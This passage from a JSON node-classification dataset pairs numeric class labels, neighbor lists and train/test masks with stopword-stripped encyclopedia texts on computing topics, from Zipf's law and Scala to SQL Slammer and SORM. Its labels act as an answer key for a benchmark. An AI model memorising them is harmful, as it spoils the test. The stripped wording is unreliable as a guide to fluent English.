simultaneously took seconds changes propagate collaborators however could work together ios os x apps would cause out-of-sync dialogs editing together collaborators using iwork icloud 2016 apple announced real-time collaboration feature available ios os x apps allows user edit create documents web using one supported browsers currently safari chrome internet explorer also means microsoft windows users access native –previously apple device– document editing tools via web interface iwork icloud limited set features compared os x version applications instance fonts available limited web version n't fully support printing may display documents created support external plug-ins incorrectly/improperly 2014 iwork icloud update adds 8 languages 50 new fonts improved editing cloud-based versions pages numbers keynote june 7 2010 showcasing new iphone 4 apple posted screenshots device action inadvertently showed possibility opening email attachment inside keynote leading believe iphone version iwork suite would soon available ios app store june 28 2010 several websites reported attempt sell applecare iphone 4 several examples services offered given including one read using iwork iphone apple-branded iphone apps sites also report quickly removed may 31 2011 apple released press statement iwork would available ios app store iphone ipod touch september 10 2013 apple announced iwork imovie iphoto would available download free new ios devices activated september 1",
    "neighbors": [
      10755,
      9732,
      1549,
      10765,
      4111,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      576,
      5696,
      8783,
      4180,
      10838,
      1623,
      3672,
      3167,
      3681,
      4194,
      9826,
      5733,
      2149,
      8806,
      3690,
      3691,
      11372,
      8303,
      2673,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      9347,
      8842,
      6797,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      6654,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      735,
      6884,
      10470,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      9964,
      10478,
      7928,
      8441,
      7420,
      2819,
      1290,
      9999,
      784,
      10512,
      4888,
      1817,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      2388,
      2901,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      3462,
      2439,
      6023,
      6539,
      7052,
      1428,
      9109,
      3483,
      2979,
      2468,
      9123,
      11171,
      11173,
      8109,
      8627,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      479,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      11257,
      8700,
      2045,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 3692,
    "label": 4,
    "text": "Enterprise_client-server_backup:enterprise client-server backup enterprise client-server backup software describes class software applications back data variety client computers centrally one server computers particular needs enterprises mind may employ scripted client–server backup model backup server program running one computer small-footprint client programs referred agents applications running computer backed up—or alternatively another process computer backup server program enterprise-specific requirements include need back large amounts data systematic basis adhere legal requirements maintenance archiving files data satisfy short-recovery-time objectives satisfy requirements world backup day 31 march highlights typical enterprise appoint backup administrator—who part office administration rather staff whose role keeper data client-server backup application server program initiates backup activity client program distinct personal backup application apple time machine time machine runs mac independently macs whether 're backing destination different one backup server client programs running separate computers connected either single platform mixed platform network client-server backup model originated magnetic tape financially-feasible storage medium backups multiple computers onto single archive file ref group note name=archivefilemaynotcontainold/historicalmaterial contrast everyday use term archive data stored archive file necessarily old historical interest. /ref magnetic tape sequential access medium imperative barring multiplexed backup client computers backed one time—as initiated backup server program described preceding paragraph two-tier configuration second-tier backup server program named server preceded name application first-tier agents backing interactive server applications configuration controls backup server program via either integrated gui separate administration console client-server backup applications three-tier configuration splits backup restore functions server program run called media servers—computers devices containing archive files attached either locally network-attached storage nas applications decision media server script run controlled using another program called either master server steady improvement hard disk drive price per byte made feasible disk-to-disk-to-tape duplication strategy combining speed disk backup restore capacity low cost tape offsite archival disaster recovery purposes file system technology led features suited optimization accommodate requirements backup administrator may part staff access secure server area enterprise client-server software may include features",
    "neighbors": [
      2944,
      2051,
      4490,
      6286,
      8721,
      10517,
      11157,
      6424,
      1049,
      6565,
      3366,
      5293,
      9901,
      9780,
      1211,
      11581,
      1990,
      1996,
      1358,
      2901,
      10711,
      8539,
      5482,
      3692,
      7022,
      6514,
      9335,
      1659
    ],
    "mask": "None"
  },
  {
    "node_id": 3693,
    "label": 3,
    "text": "Reference_model:reference model reference model systems enterprise software engineering abstract framework domain-specific ontology consisting interlinked set clearly defined concepts produced expert body experts order encourage clear communication reference model represent component parts consistent idea business functions system components long represents complete set frame reference used communicate ideas clearly among members community reference models often illustrated set concepts indication relationships concepts according oasis organization advancement structured information standards reference model abstract framework understanding significant relationships among entities environment development consistent standards specifications supporting environment reference model based small number unifying concepts may used basis education explaining standards non-specialist reference model directly tied standards technologies concrete implementation details seek provide common semantics used unambiguously across different implementations number concepts rolled 'reference model concepts important many uses reference model one use create standards objects inhabit model relationships one another creating standards work engineers developers need create objects behave according standard made easier software written meets standard developers copy software use build software factory generates code done well standard make use design patterns support key qualities software ability extend software inexpensive way another use reference model educate using reference model leaders software development help break large problem space smaller problems understood tackled refined developers new particular set problems quickly learn different problems focus problems asked solve trusting areas well understood rigorously constructed level trust important allow software developers efficiently focus work third use reference model improve communication people reference model breaks problem entities things exist often explicit recognition concepts many people already share created explicit manner reference model useful defining concepts differ relate one another improves communication individuals involved using concepts fourth use reference model create clear roles responsibilities creating model entities relationships organization dedicate specific individuals teams making responsible solving problem concerns specific set entities example reference model describes set business measurements needed create balanced scorecard measurement assigned specific business leader allows senior manager hold team members responsible producing high quality results fifth use reference model allow comparison different things breaking problem space basic concepts reference model used examine two different solutions problem component parts solution discussed relation one another example reference model describes computer systems help track contacts business customers reference model used business decide five different software products purchase based needs reference model example could used compare well candidate solutions configured meet needs particular business process instances reference models include among others",
    "neighbors": [
      6950,
      4979,
      5614
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3694,
    "label": 0,
    "text": "Zipf's_law:zipf law /math h n th generalized harmonic number| zipf law empirical law formulated using mathematical statistics refers fact many types data studied physical social sciences approximated zipfian distribution one family related discrete power law probability distributions zipf distribution related zeta distribution identical example zipf law states given corpus natural language utterances frequency word inversely proportional rank frequency table thus frequent word occur approximately twice often second frequent word three times often third frequent word etc rank-frequency distribution inverse relation example brown corpus american english text word frequently occurring word accounts nearly 7 word occurrences 69,971 slightly 1 million true zipf law second-place word accounts slightly 3.5 words 36,411 occurrences followed 28,852 135 vocabulary items needed account half brown corpus law named american linguist george kingsley zipf 1902–1950 popularized sought explain zipf 1935 1949 though claim originated french stenographer jean-baptiste estoup 1868–1950 appears noticed regularity zipf also noted 1913 german physicist felix auerbach 1856–1933 relationship occurs many rankings unrelated language population ranks cities various countries corporation sizes income rankings ranks number people watching tv channel appearance distribution rankings cities population first noticed felix auerbach 1913 empirically data set tested see whether zipf law applies checking goodness fit empirical distribution hypothesized power law distribution kolmogorov–smirnov test comparing log likelihood ratio power law distribution alternative distributions like exponential distribution lognormal distribution zipf law checked cities better fit found exponent 1.07 i.e formula_8 largest settlement formula_9 size largest settlement zipf law easily observed plotting data log-log graph axes log rank order log frequency example word described would appear x log 1 log 69971 also possible plot reciprocal rank frequency reciprocal frequency interword interval rank data conform zipf law extent plot linear formally let zipf law predicts population n elements normalized frequency elements rank k f k n zipf law holds number elements given frequency random variable power law distribution formula_11 claimed representation zipf law suitable statistical testing way analyzed 30,000 english texts goodness-of-fit tests yield 15 texts statistically compatible form zipf law slight variations definition zipf law increase percentage close 50 example frequency words english language n number words english language use classic version zipf law exponent 1 f k n fraction time k th common word occurs law may also written h n th generalized harmonic number simplest case zipf law ⁄ function given set zipfian distributed frequencies sorted common least common second common frequency occur ½ often first third common frequency occur ⅓ often first fourth common frequency occur ¼ often first n common frequency occur ⁄ often first however hold exactly items must occur integer number times 2.5 occurrences word nevertheless fairly wide ranges fairly good approximation many natural phenomena obey zipf law human languages word frequencies heavy-tailed distribution therefore modeled reasonably well zipf distribution close 1 long exponent exceeds 1 possible law hold infinitely many words since 1 ζ riemann zeta function although zipf ’ law holds languages even non-natural ones like esperanto reason still well understood however may partially explained statistical analysis randomly generated texts wentian li shown document character chosen randomly uniform distribution letters plus space character words different lengths follow macro-trend zipf law probable words shortest equal probability vitold belevitch paper statistical laws linguistic distribution offered mathematical derivation took large class well-behaved statistical distributions normal distribution expressed terms rank expanded expression taylor series every case belevitch obtained remarkable result first-order truncation series resulted zipf law second-order truncation taylor series resulted mandelbrot law principle least effort another possible explanation zipf proposed neither speakers hearers using given language want work harder necessary reach understanding process results approximately equal distribution effort leads observed zipf distribution similarly preferential attachment intuitively rich get richer success breeds success results yule–simon distribution shown fit word frequency versus rank language population versus city rank better zipf law originally derived explain population versus rank species yule applied cities simon zipf law fact refers generally frequency distributions rank data relative frequency n th-ranked item given zeta distribution 1/ n ζ parameter 1 indexes members family probability distributions indeed zipf law sometimes synonymous zeta distribution since probability distributions sometimes called laws distribution sometimes called zipfian distribution generalization zipf law zipf–mandelbrot law proposed benoît mandelbrot whose frequencies constant reciprocal hurwitz zeta function evaluated practice easily observable distribution plots large corpora observed distribution modelled accurately sum separate distributions different subsets subtypes words follow different parameterizations zipf–mandelbrot distribution particular closed class functional words exhibit lower 1 open-ended vocabulary growth document size corpus size require greater 1 convergence generalized harmonic series zipfian distributions obtained pareto distributions exchange variables zipf distribution sometimes called discrete pareto distribution analogous continuous pareto distribution way discrete uniform distribution analogous continuous uniform distribution tail frequencies yule–simon distribution approximately choice ρ 0 parabolic fractal distribution logarithm frequency quadratic polynomial logarithm rank markedly improve fit simple power-law relationship like fractal dimension possible calculate zipf dimension useful parameter analysis texts argued benford law special bounded case zipf law connection two laws explained originating scale invariant functional relations statistical physics critical phenomena ratios probabilities benford law constant leading digits data satisfying zipf law 1 satisfy benford law information theory symbol event signal probability formula_16 contains formula_17 bits information hence zipf law natural numbers formula_18 equivalent number formula_19 containing formula_20 bits information add information symbol probability formula_16 information already stored natural number formula_19 go formula_23 formula_24 equivalently formula_25 instance standard binary system would formula_26 optimal formula_27 probability distribution using formula_25 rule general probability distribution base asymmetric numeral systems family entropy coding methods used data compression state distribution also governed zipf law zipf law also used extraction parallel fragments texts comparable corpora primary secondary international conference bioinformatics computational biology 2011",
    "neighbors": [
      6279,
      2247,
      7599,
      9617,
      3635,
      8155,
      10621,
      10527
    ],
    "mask": "Test"
  },
  {
    "node_id": 3695,
    "label": 5,
    "text": "T/TCP:t/tcp t/tcp transactional transmission control protocol variant transmission control protocol tcp experimental tcp extension efficient transaction-oriented request/response service developed fill gap tcp udp bob braden 1994 definition found rfc 1644 obsoletes rfc 1379 faster tcp delivery reliability comparable tcp t/tcp suffers several major security problems described charles hannum september 1996 gained widespread popularity rfc 1379 rfc 1644 define t/tcp moved historic status may 2011 rfc 6247 security reasons tcp fast open recent alternative",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      1229,
      2509,
      4687,
      592,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      98,
      10341,
      10344,
      11112,
      2922,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 3696,
    "label": 6,
    "text": "Red_Hat_Storage_Server:red hat storage server red hat gluster storage formerly red hat storage server computer storage product red hat based open source technologies glusterfs red hat enterprise linux latest release rhgs 3.1 combines red hat enterprise linux rhel 6 also rhel 7 latest glusterfs community release ovirt xfs file system april 2014 red hat re-branded glusterfs-based red hat storage server red hat gluster storage red hat gluster storage scale-out nas product uses basis glusterfs distributed file-system red hat gluster storage also exemplifies software-defined storage sds june 2012 red hat gluster storage announced commercially supported integration glusterfs red hat enterprise linux",
    "neighbors": [
      7802,
      8962,
      9455
    ],
    "mask": "None"
  },
  {
    "node_id": 3697,
    "label": 4,
    "text": "Laura_Holmes:laura holmes laura holmes 1932-2016 noted cryptanalyst 2011 inductee nsa hall honor 1980s laura holmes served career cryptanalyst supervisor series challenging manual cryptosystems also developed considerable expertise impressive number target languages office analyzed 100 manual systems variety targets none systems monoalphabetic contained nontrivial trick made analysis especially difficult many cases problem marked small quantities traffic despite tough obstacles ms. holmes unexpectedly high rate success",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3698,
    "label": 3,
    "text": "SpiNNaker:spinnaker spinnaker spiking neural network architecture massively parallel manycore supercomputer architecture designed advanced processor technologies research group apt school computer science university manchester composed 57,600 arm9 processors specifically arm968 18 cores 128 mb mobile ddr sdram totalling 1,036,800 cores 7 tb ram computing platform based spiking neural networks useful simulating human brain see human brain project completed design housed 10 19-inch racks rack holding 100,000 cores cards holding chips held 5 blade enclosures core emulates 1000 neurons total goal simulate behavior aggregates billion neurons real time machine requires 100 kw 240 v supply air-conditioned environment spinnaker used one component neuromorphic computing platform human brain project october 14 2018 hbp announced million core milestone achieved",
    "neighbors": [
      2304,
      9345,
      9224,
      1801,
      5774,
      4624,
      11538,
      7699,
      5245,
      5404,
      10909,
      10658,
      939,
      7983,
      8122,
      10557,
      4799,
      8514,
      8262,
      5319,
      9926,
      9932,
      5585,
      11474,
      10452,
      2901,
      9688,
      4569,
      2394,
      731,
      2781,
      11487,
      2273,
      7780,
      8421,
      6502,
      9964,
      8688,
      9714,
      2804,
      2294,
      119,
      2680,
      7164,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3699,
    "label": 3,
    "text": "Trap_flag:trap flag trap flag permits operation processor single-step mode flag available debuggers use step execution computer program system instructed single-step execute one instruction stop contents registers memory locations examined correct system told go execute next instruction intel 8086 trap flag type-1 interrupt response make quite easy implement single-step feature 8086-based system trap flag set 8086 automatically type-1 interrupt instruction executes 8086 type-1 interrupt pushes flag register stack 8086 instruction directly set reset trap flag operations done pushing flag register stack changing trap flag bit programmer wants popping flag register back stack instructions set trap flag actually use trap flag way normally monitoring program isr continue execution program iret reset trap flag simply replace instruction preceding sequence instruction trap flag reset 8086 type-1 interrupt single-step mode disabled interrupt-service procedure",
    "neighbors": [
      11107,
      9668,
      9158,
      4553,
      5457,
      5234,
      602
    ],
    "mask": "None"
  },
  {
    "node_id": 3700,
    "label": 4,
    "text": "Confused_deputy_problem:confused deputy problem information security confused deputy problem often cited example capability-based security important confused deputy legitimate privileged computer program tricked another program misusing authority system specific type privilege escalation capability systems protect confused deputy problem whereas access control list-based systems original example confused deputy program provides compilation services programs normally client program specifies name input output files server given access files client compiler service pay-per-use compiler service stores billing information file dubbed bill access situation client calls service names output file bill confused deputy problem occurs service opens output file even though client access file service open succeeds server writes compilation output file bill normal overwriting thus destroying billing information example compilation service deputy acting request client service seen 'confused tricked overwriting billing file whenever program tries access file operating system needs know two things file program asking whether program permission access file example file designated name “ bill ” server receives file name client know whether client permission write file server opens file system uses server ’ permission client ’ file name passed client server permission go along permission increased system silently automatically essential attack billing file designated name represented string essential points confidence trick based scams based gaining trust victim order attacker use confused deputy example salting attacker presents victim appears mineral-rich mine case attacker using victim greed persuade perform action victim would normally checking grocery store cashier scan barcode item determine total cost thief could replace barcodes items cheaper items attack cashier confused deputy using seemingly valid barcodes determine total cost cross-site request forgery csrf example confused deputy attack uses web browser perform sensitive actions web application common form attack occurs web application uses cookie authenticate requests transmitted browser using javascript attacker force browser transmitting authenticated http requests samy computer worm used cross-site scripting xss turn browser authenticated myspace session confused deputy using xss worm forced browser posting executable copy worm myspace message viewed executed friends infected user clickjacking attack user acts confused deputy attack user thinks harmlessly browsing website attacker-controlled website fact tricked performing sensitive actions another website ftp bounce attack allow attacker connect indirectly tcp ports attacker machine access using remote ftp server confused deputy another example relates personal firewall software restrict internet access specific applications applications circumvent starting browser instructions access specific url browser authority open network connection even though application firewall software attempt address prompting user cases one program starts another accesses network however user frequently sufficient information determine whether access legitimate—false positives common substantial risk even sophisticated users become habituated clicking ok prompts every program misuses authority confused deputy sometimes misuse authority simply result program error confused deputy problem occurs designation object passed one program another associated permission changes unintentionally without explicit action either party insidious neither party anything explicit change authority systems possible ask operating system open file using permissions another client solution drawbacks simplest way solve confused deputy problem bundle together designation object permission access object exactly capability using capability security compiler example client would pass server capability output file file descriptor rather name file since lacks capability billing file designate file output cross-site request forgery example url supplied cross -site would include authority independent client web browser",
    "neighbors": [
      256,
      5636,
      7044,
      2951,
      8344,
      6813,
      3999,
      1952,
      10146,
      2470,
      9646,
      7983,
      8753,
      7480,
      3643,
      10813,
      4034,
      7364,
      1225,
      7884,
      11596,
      10835,
      728,
      4198,
      5483,
      8045,
      10614,
      5113,
      5373,
      2558,
      5503
    ],
    "mask": "Train"
  },
  {
    "node_id": 3701,
    "label": 4,
    "text": "Operations_security:operations security operations security opsec process identifies critical information determine friendly actions observed enemy intelligence determines information obtained adversaries could interpreted useful executes selected measures eliminate reduce adversary exploitation friendly critical information general sense opsec process protecting individual pieces data could grouped together give bigger picture called aggregation opsec protection critical information deemed mission essential military commanders senior leaders management decision-making bodies process results development countermeasures include technical non-technical measures use email encryption software taking precautions eavesdropping paying close attention picture taken items background talking openly social media sites information unit activity organization critical information list term operations security coined united states military vietnam war opsec five-step iterative process assists organization identifying specific pieces information requiring protection employing measures protect br opsec assessment formal application process existing operation activity multidisciplinary team experts assessments identify requirements additional opsec measures required changes existing ones additionally opsec planners working closely public affairs personnel must develop essential elements friendly information eefi used preclude inadvertent public disclosure critical sensitive information term eefi phased favor critical information affected agencies use term minimizing confusion 1966 united states admiral ulysses sharp established multidisciplinary security team investigate failure certain combat operations vietnam war operation dubbed operation purple dragon included personnel national security agency department defense operation concluded purple dragon team codified recommendations called process operations security order distinguish process existing processes ensure continued inter-agency support 1988 president ronald reagan signed national security decision directive nsdd 298 document established national operations security program named director national security agency executive agent inter-agency opsec support document also established interagency opsec support staff ioss although originally developed us military methodology operations security adopted worldwide military private sector operations 1992 north atlantic treaty organization nato added opsec glossary terms definitions private sector also adopted opsec defensive measure competitive intelligence collection efforts military private sector security information firms often require opsec professionals certification often initially obtained military governmental organizations",
    "neighbors": [
      11046,
      10442,
      7887,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3702,
    "label": 2,
    "text": "Physical_address:physical address computing physical address also real address binary address memory address represented form binary number address bus circuitry order enable data bus access particular storage cell main memory register memory mapped i/o device computer supporting virtual memory term physical address used mostly differentiate virtual address particular computers utilizing memory management unit mmu translate memory addresses virtual physical addresses refer address translation performed mmu respectively depending upon underlying computer architecture performance computer may hindered unaligned access memory example 16-bit computer 16-bit memory data bus intel 8086 generally less overhead access aligned even address case fetching one 16-bit value requires single memory read operation single transfer data bus 16-bit data value starts odd address processor may need perform two memory read cycles load value i.e one low address throwing away half second read cycle load high address throwing away half retrieved data processors motorola 68000 motorola 68010 processors sparc processors unaligned memory accesses result exception raised usually resulting software exception posix sigbus raised direct memory access dma feature allows devices mother board cpu address main memory devices therefore also need knowledge physical addresses",
    "neighbors": [
      4101,
      9466,
      3725,
      11539,
      5783,
      2073,
      11674,
      4513,
      10145,
      2339,
      5796,
      6821,
      5933,
      7601,
      11574,
      8251,
      6087,
      4424,
      9932,
      1614,
      594,
      6868,
      7039,
      5598,
      6239,
      7269,
      6247,
      5356,
      6252,
      499,
      7411,
      5237,
      1399,
      10872,
      634,
      2556,
      5885,
      255
    ],
    "mask": "Test"
  },
  {
    "node_id": 3703,
    "label": 4,
    "text": "SORM:sorm sorm technical specification lawful interception interfaces telecommunications telephone networks operating russia current form specification enables targeted surveillance telephone internet communications initially implemented 1995 allow access surveillance data fsb subsequent years access widened law enforcement agencies sorm first implemented 1995 requiring telecommunications operators install fsb-provided hardware allowing agency monitor users ’ communications metadata content included phone calls email traffic web browsing activity despite low internet penetration rate time july 1998 system replaced sorm‑2 sorm‑2 russian internet service providers isps must install special device servers allow fsb track credit card transactions e-mail messages web use device must installed isp expense estimated cost 10,000– 30,000 reports note isps install direct communications lines fsb costs implementing required changes excess 100,000 july 2000 russia minister information technology communications leonid reiman issued order 130 concerning introduction technical means ensuring investigative activity sorm phone mobile wireless communication radio paging networks stating fsb longer required provide telecommunications internet companies documentation targets interest prior accessing information august 2014 sorm-2 usage extended monitoring social networks chats forums requiring operators install sorm probes networks ministerial order russian ministry communications 16 april 2014 introduced requirements new wiretapping system sorm-3 telecommunications operators required install compliant equipment 31 march 2015 according regulations russian ministry communications sorm-3 equipment supports following selectors targeted surveillance equipment deep packet inspection dpi capability russia uses deep packet inspection dpi nationwide scale part dpi infrastructure used sorm mobile networks use dpi additionally filter traffic sorm device recommended fsb named omega equipment cellebrite appears use sorm also enables use mobile control points laptop plugged directly communication hubs immediately intercept record operator traffic roskomnadzor federal executive body responsible media control reported several local isps fined government failed install fsb-recommended sorm devices january 5 2000 first week office president vladimir putin amended law allow seven federal security agencies next fsb access data gathered via sorm newly endowed agencies included acquisition communications entitled security services general requires court warrant time allowed start wiretapping obtaining warrant warrant also required communications content metadata communicating parties time location etc may obtained without warrant cases fsb operative required get eavesdropping warrant obligation show anyone telecom providers right demand fsb provide warrant denied access surveillance boxes security service calls special controller fsb headquarters connected protected cable directly sorm device installed isp network since 2010 intelligence officers wiretap someone phones monitor internet activity based received reports individual preparing commit crime back allegations formal criminal charges suspect according 2011 ruling intelligence officers right conduct surveillance anyone claim preparing call extremist activity december 2015 european court human rights ruled case legality russian sorm legislation unanimous grand chamber decision court ruled russian legal provisions provide adequate effective guarantees arbitrariness risk abuse inherent system secret surveillance noted risk particularly high system secret services police direct access technical means mobile telephone communications ruled therefore legislation violated article 8 european convention human rights july 2016 president vladimir putin signed law two sets legislative amendments commonly referred yarovaya law key author irina yarovaya leading member ruling party united russia new regulations take effect july 1 2018 according amendments internet telecom companies required disclose communications metadata well information necessary authorities request without court order",
    "neighbors": [
      3495,
      6344,
      4041,
      1930,
      7887,
      1169,
      9233,
      7411,
      10417,
      7893,
      9909,
      10935,
      5469,
      5470,
      8735
    ],
    "mask": "None"
  },
  {
    "node_id": 3704,
    "label": 4,
    "text": "SQL_Slammer:sql slammer sql slammer 2003 computer worm caused denial service internet hosts dramatically slowed general internet traffic spread rapidly infecting 75,000 victims within ten minutes program exploited buffer overflow bug microsoft sql server desktop engine database products although ms02-039 patch released six months earlier many organizations yet applied worm based proof concept code demonstrated black hat briefings david litchfield initially discovered buffer overflow vulnerability worm exploited small piece code little generate random ip addresses send addresses selected address happens belong host running unpatched copy microsoft sql server resolution service listening udp port 1434 host immediately becomes infected begins spraying internet copies worm program home pcs generally vulnerable worm unless msde installed worm small contain code write disk stays memory easy remove example symantec provides free removal utility see external link even removed restarting sql server although machine would likely reinfected immediately worm made possible software security vulnerability sql server first reported microsoft 24 july 2002 patch available microsoft six months prior worm launch many installations patched – including many microsoft worm began noticed early 25 january 2003 slowed systems worldwide slowdown caused collapse numerous routers burden extremely high bombardment traffic infected servers normally traffic high routers handle routers supposed delay temporarily stop network traffic instead routers crashed became unusable neighbour routers would notice routers stopped contacted aka removed routing table routers started sending notices effect routers knew flood routing table update notices caused additional routers fail compounding problem eventually crashed routers maintainers restarted causing announce status leading another wave routing table updates soon significant portion internet bandwidth consumed routers communicating update routing tables ordinary data traffic slowed cases stopped altogether sql slammer worm small size sometimes able get legitimate traffic two key aspects contributed sql slammer rapid propagation worm infected new hosts sessionless udp protocol entire worm 376 bytes fits inside single packet result infected host could instead simply fire forget packets rapidly possible",
    "neighbors": [
      3072,
      5636,
      3852,
      11413,
      11030,
      3867,
      9630,
      9375,
      675,
      6051,
      8363,
      10297,
      1474,
      9423,
      4562,
      1113,
      7515,
      4830,
      5087,
      4063,
      2147,
      2275,
      1381,
      1254,
      8045,
      4462,
      6520,
      2041
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3705,
    "label": 9,
    "text": "Scala_(programming_language):scala programming language scala general-purpose programming language providing support functional programming strong static type system designed concise many scala design decisions aimed address criticisms java scala source code intended compiled java bytecode resulting executable code runs java virtual machine scala provides language interoperability java libraries written either language may referenced directly scala java code like java scala object-oriented uses curly-brace syntax reminiscent c programming language unlike java scala many features functional programming languages like scheme standard ml haskell including currying type inference immutability lazy evaluation pattern matching also advanced type system supporting algebraic data types covariance contravariance higher-order types higher-rank types anonymous types features scala present java include operator overloading optional parameters named parameters raw strings conversely feature java scala checked exceptions proved controversial name scala portmanteau scalable language signifying designed grow demands users design scala started 2001 école polytechnique fédérale de lausanne epfl lausanne switzerland martin odersky followed work funnel programming language combining ideas functional programming petri nets odersky formerly worked generic java javac sun java compiler internal release late 2003 scala released publicly early 2004 java platform second version v2.0 followed march 2006 17 january 2011 scala team five-year research grant €2.3 million european research council 12 may 2011 odersky collaborators launched typesafe inc. later renamed lightbend inc. company provide commercial support training services scala typesafe received 3 million investment 2011 greylock partners scala runs java platform java virtual machine compatible existing java programs android applications typically written java translated java bytecode dalvik bytecode may translated native machine code installation packaged scala java compatibility makes well-suited android development functional approach preferred reference scala software distribution including compiler libraries released apache license scala.js scala compiler compiles javascript making possible write scala programs run web browsers node.js compiler development since 2013 announced longer experimental 2015 v0.6 version v1.0.0-m1 released june 2018 2019 still m7 scala native scala compiler targets llvm compiler infrastructure create executable code uses lightweight managed runtime uses boehm garbage collector project led denys shabalin first release 0.1 14 march 2017 development scala native began 2015 goal faster just-in-time compilation jvm eliminating initial runtime compilation code also providing ability call native routines directly reference scala compiler targeting .net framework common language runtime released june 2004 officially dropped 2012 hello world program written scala form unlike stand-alone hello world application java class declaration nothing declared static singleton object created object keyword used instead program stored file helloworld.scala user compiles command runs analogous process compiling running java code indeed scala compiling executing model identical java making compatible java build tools apache ant shorter version hello world scala program scala includes interactive shell scripting support saved file named codice_1 run script prior compiling using commands also entered directly scala interpreter using option expressions entered interactively repl following example shows differences java scala syntax syntactic differences code syntactic relaxations designed allow support domain-specific languages basic syntactic differences following example contrasts definition classes java scala code shows conceptual differences java scala handling classes scala compiling model java c namely separate compiling dynamic class loading scala code call java libraries scala operational characteristics java scala compiler generates byte code nearly identical generated java compiler fact scala code decompiled readable java code exception certain constructor operations java virtual machine jvm scala code java code indistinguishable difference one extra runtime library codice_35 scala adds large number features compared java fundamental differences underlying model expressions types make language theoretically cleaner eliminate several corner cases java scala perspective practically important several added features scala also available c examples include mentioned scala good deal syntactic flexibility compared java following examples may seem like questionable choices collectively serve purpose allowing domain-specific languages defined scala without needing extend compiler example erlang special syntax sending message actor i.e codice_67 implemented scala library without needing language extensions java makes sharp distinction primitive types e.g codice_68 codice_69 reference types class reference types part inheritance scheme deriving codice_70 scala types inherit top-level class codice_71 whose immediate children codice_72 value types codice_73 codice_74 codice_75 reference types java means java distinction primitive types boxed types e.g codice_68 vs. codice_77 present scala boxing unboxing completely transparent user scala 2.10 allows new value types defined user instead java foreach loops looping iterator scala codice_78-expressions similar list comprehensions languages haskell combination list comprehensions generator expressions python for-expressions using codice_79 keyword allow new collection generated iterating existing one returning new collection type translated compiler series codice_64 codice_65 codice_66 calls codice_79 used code approximates imperative-style loop translating codice_84 simple example result running following vector complex example iterating map expression codice_88 example pattern matching see iterating map returns set key-value tuples pattern-matching allows tuples easily destructured separate variables key value similarly result comprehension also returns key-value tuples automatically built back map source object variable codice_89 map note codice_89 instead held list set array collection tuples exactly code would yield new collection type supporting object-oriented features available java fact augmenting various ways scala also provides large number capabilities normally found functional programming languages together features allow scala programs written almost completely functional style also allow functional object-oriented styles mixed examples unlike c java similar languages lisp scala makes distinction statements expressions statements fact expressions evaluate value functions would declared returning codice_24 c java statements like codice_92 logically return value scala considered return type codice_25 singleton type one object type functions operators never return e.g codice_94 operator function always exits non-locally using exception logically return type codice_95 special type containing objects bottom type i.e subclass every possible type turn makes type codice_95 compatible every type allowing type inference function correctly similarly codice_97 statement actually expression produces value i.e result evaluating one two branches means block code inserted wherever expression desired obviating need ternary operator scala similar reasons codice_7 statements unnecessary scala fact discouraged lisp last expression block code value block code block code body function returned function make clear functions expressions even methods return codice_25 written equals sign equivalently type inference omitting unnecessary braces due type inference type variables function return values many expressions typically omitted compiler deduce examples codice_100 immutable constant immutable object codice_101 variable whose value later changed type inference scala essentially local contrast global hindley-milner algorithm used haskell ml purely functional languages done facilitate object-oriented programming result certain types still need declared notably function parameters return types recursive functions e.g return type declared recursive function scala functions objects convenient syntax exists specifying anonymous functions example expression codice_102 specifies function one parameter compares argument see less 2 equivalent lisp form codice_103 note neither type codice_104 return type need explicitly specified generally inferred type inference explicitly specified e.g codice_105 even codice_106 anonymous functions behave true closures automatically capture variables lexically available environment enclosing function variables available even enclosing function returns unlike case java anonymous inner classes need declared final even possible modify variables mutable modified value available next time anonymous function called even shorter form anonymous function uses placeholder variables example following written concisely even scala enforces distinction immutable unmodifiable read-only variables whose value changed assigned mutable variables changed similar distinction made immutable mutable objects distinction must made variable declared immutable variables declared codice_5 mutable variables use codice_6 similarly collection objects container types scala e.g linked lists arrays sets hash tables available mutable immutable variants immutable variant considered basic default implementation immutable variants persistent data types create new object encloses old object adds new member similar linked lists built lisp elements prepended creating new cons cell pointer new element head old list tail allows easy concurrency — locks needed shared objects ever modified immutable structures also constructed efficiently sense modified instances reuses old instance data unused/unreferenced parts collected gc evaluation strict eager default words scala evaluates expressions soon available rather needed however possible declare variable non-strict lazy codice_112 keyword meaning code produce variable value evaluated first time variable referenced non-strict collections various types also exist type codice_113 non-strict linked list collection made non-strict codice_114 method non-strict collections provide good semantic fit things like server-produced data evaluation code generate later elements list turn triggers request server possibly located somewhere else web happens elements actually needed functional programming languages commonly provide tail call optimization allow extensive use recursion without stack overflow problems limitations java bytecode complicate tail call optimization jvm general function calls tail call optimized mutually recursive functions trampolines suggested workaround trampoline support provided scala library object codice_115 since scala 2.8.0 released 14 july 2010 function may optionally annotated codice_116 case compile unless tail recursive scala built-in support pattern matching thought sophisticated extensible version switch statement arbitrary data types matched rather simple types like integers booleans strings including arbitrary nesting special type class known case class provided includes automatic support pattern matching used model 